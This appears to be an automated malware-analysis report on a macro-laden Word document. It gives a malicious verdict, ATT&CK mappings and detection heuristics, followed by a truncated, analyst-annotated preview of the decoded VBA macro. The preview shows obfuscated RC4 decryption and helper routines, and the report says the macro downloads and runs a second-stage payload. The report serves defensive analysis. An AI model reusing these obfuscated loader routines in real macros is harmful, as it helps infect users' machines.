Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with a Document_Open auto-execution routine. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Trojan.Agent-1383193' further supports its malicious nature. The primary function of the VBA script appears to be downloading and executing a second-stage payload.
Heuristics (6)
- ClamAV: Doc.Trojan.Agent-1383193 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Agent-1383193
- VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA | critical | OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro | high | OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.iec.ch (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59216 bytes |

SHA-256 (macros.bas): 9c8855a6c8f437fd0da0b6c10037d7e532b3d31be95a0f223ed4475f7fc41d48
Preview script (first 1,000 lines of the extracted script; the preview is truncated, and analyst comments marked with ' have been added to the decoded source):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim OGE(1921) As Long

' Obfuscated RC4 routine: key-scheduling (KSA) followed by the keystream loop (PRGA).
' Every arithmetic blob of the form (64 + N + 64 - N + 64 + N + 64 - N) evaluates to 256
' (255 with the trailing "- 1"); it is only there to defeat string/constant matching.
Function D4BZDXHtoIlT9(BtbO() As Byte, KEYMo3zn() As Byte) As String
On Error Resume Next
Dim VVG6RIpp9g2jgNZJc(0 To 255) As Integer, RtRnr As Long, CuSRMvQgIGGwOkz As Long, C0J6bjpgemsF As Long, W5Q3t8GmDa9O As Byte, EIM() As Byte, IkFgyKBVaC() As Byte
ReDim EIM(Uxu2QnGVYymtt0lx(BtbO)) As Byte
EIM = BtbO
ReDim IkFgyKBVaC(Uxu2QnGVYymtt0lx(KEYMo3zn)) As Byte
IkFgyKBVaC = KEYMo3zn
' KSA: identity permutation of the S-box
For RtRnr = 0 To (64 + 750 + 64 - 750 + 64 + 750 + 64 - 750 - 1)
VVG6RIpp9g2jgNZJc(RtRnr) = RtRnr
Next RtRnr
RtRnr = 0
CuSRMvQgIGGwOkz = 0
C0J6bjpgemsF = 0
' KSA: key-dependent swaps
For RtRnr = 0 To (64 + 268 + 64 - 268 + 64 + 268 + 64 - 268 - 1)
CuSRMvQgIGGwOkz = (CuSRMvQgIGGwOkz + VVG6RIpp9g2jgNZJc(RtRnr) + IkFgyKBVaC(RtRnr Mod (Uxu2QnGVYymtt0lx(KEYMo3zn) + 1))) Mod ((64 + 246 + 64 - 246 + 64 + 246 + 64 - 246))
W5Q3t8GmDa9O = VVG6RIpp9g2jgNZJc(RtRnr)
VVG6RIpp9g2jgNZJc(RtRnr) = VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)
VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) = W5Q3t8GmDa9O
Next RtRnr
RtRnr = 0
CuSRMvQgIGGwOkz = 0
C0J6bjpgemsF = 0
' PRGA: each input byte is combined (via Ex1BxbmL, not shown in this preview) with one keystream byte
For RtRnr = 0 To Uxu2QnGVYymtt0lx(BtbO)
CuSRMvQgIGGwOkz = (CuSRMvQgIGGwOkz + 1) Mod (64 + 54 + 64 - 54 + 64 + 54 + 64 - 54)
C0J6bjpgemsF = (C0J6bjpgemsF + VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)) Mod (64 + 58 + 64 - 58 + 64 + 58 + 64 - 58)
W5Q3t8GmDa9O = VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)
VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) = VVG6RIpp9g2jgNZJc(C0J6bjpgemsF)
VVG6RIpp9g2jgNZJc(C0J6bjpgemsF) = W5Q3t8GmDa9O
EIM(RtRnr) = Ex1BxbmL(EIM(RtRnr), (VVG6RIpp9g2jgNZJc((VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) + VVG6RIpp9g2jgNZJc(C0J6bjpgemsF)) Mod ((64 + 157 + 64 - 157 + 64 + 157 + 64 - 157)))))
Next RtRnr
D4BZDXHtoIlT9 = zTo(EIM)
End Function

' UBound() emulation: indexes the array until an out-of-range error fires, then returns the last
' valid index. The "<name> = Day(Now)" assignments to undeclared variables throughout this file
' are dead statements inserted as padding; they have no effect on the logic.
Function Uxu2QnGVYymtt0lx(ByVal QH6ZZpxoX4zseh As Variant) As Long
VVH1kEVg2VRlpF = Day(Now)
On Error GoTo Un1PCT3zpV
Cd6YGvjkiuS = Day(Now)
Dim I8sey16RJ As Long, GiuStH As Variant
NcEhnfOz = Day(Now)
Do
GiuStH = QH6ZZpxoX4zseh(I8sey16RJ)
I8sey16RJ = I8sey16RJ + 1
Loop
RKYkkQ1IPhvZNS = Day(Now)
Un1PCT3zpV:
YSAkSwtLjI4zOvYg8 = Day(Now)
If I8sey16RJ = 0 Then Exit Function
TIjssi9 = Day(Now)
Uxu2QnGVYymtt0lx = I8sey16RJ - 1
QImkkPOVFT = Day(Now)
End Function

' Maps the decimal digit at position OjCP of a number to its ASCII code (48..57)
Function zNumber(FrmbW1Ww3 As Long, OjCP As Long) As Byte
Dim F7 As Long, Ef3I2PixLj As Long
For F7 = 48 To 57
If Mid(FrmbW1Ww3, OjCP, 1) = Ef3I2PixLj Then zNumber = F7: Exit For
Ef3I2PixLj = Ef3I2PixLj + 1
Next F7
End Function

' Byte array to string, one character per byte via zC()
Function zTo(zbyte() As Byte) As String
Dim i As Long
For i = 0 To Uxu2QnGVYymtt0lx(zbyte)
zTo = zTo & zC(zbyte(i))
Next i
End Function

' Splits a Long into its 4 bytes (big-endian), then reverses them to little-endian order
Function M6G6YPdQKTAd(Utt4RHudl As Long) As Byte()
VM1qacdiyqp = Day(Now)
Dim J5VPc0efYCX3(3) As Byte, D27a As Long, LYwqMqZgXIFA As Byte
EL3fKpzYhvlN4eK = Day(Now)
For D27a = 0 To 3
J5VPc0efYCX3(D27a) = (Int(Utt4RHudl / (2 ^ (8 * (3 - D27a))))) And ((2 ^ 8) - 1)
Next D27a
E7inQcjika = Day(Now)
For D27a = 0 To Uxu2QnGVYymtt0lx(J5VPc0efYCX3) \ 2
LYwqMqZgXIFA = J5VPc0efYCX3(D27a)
J5VPc0efYCX3(D27a) = J5VPc0efYCX3(Uxu2QnGVYymtt0lx(J5VPc0efYCX3) - D27a)
J5VPc0efYCX3(Uxu2QnGVYymtt0lx(J5VPc0efYCX3) - D27a) = LYwqMqZgXIFA
Next D27a
QqwrKPCQuC = Day(Now)
ReDim M6G6YPdQKTAd(3) As Byte
FYdbIul2v7j = Day(Now)
M6G6YPdQKTAd = J5VPc0efYCX3
XVGMvuJo3Ud = Day(Now)
End Function

' Static-counter trick with a recursive self-call hidden behind Debug.Assert; the argument is unused
Function XldPou(N1F8nvQsaRP As Integer) As Boolean
GKRXRn1E0Iln = Day(Now)
Static UFjnWDTuQ5C8PK As Byte
BJgpVUXIW = Day(Now)
UFjnWDTuQ5C8PK = UFjnWDTuQ5C8PK + 1
OmOqrAo9Vjw = Day(Now)
If UFjnWDTuQ5C8PK = 1 Then Debug.Assert Not XldPou(30)
Tmc3yxY4iiLm0Rnz1 = Day(Now)
XldPou = UFjnWDTuQ5C8PK = 0
M8Sn3stF4g = Day(Now)
UFjnWDTuQ5C8PK = 0
YRqurazIDYD = Day(Now)
End Function

' Chr()-style conversion of a character code to a string; the preview is cut off inside this function
Function zC(ByVal Character As Integer) As String
Dim bArr(1) As Byte, Byte1 As Byte, Byte2 As Byte, i As Long
If Character < 0 Then Exit Function
If Character > (64 + 290 + 64 - 290 + 64 + 290 + 64 - 290 - 1) ...
```

(truncated)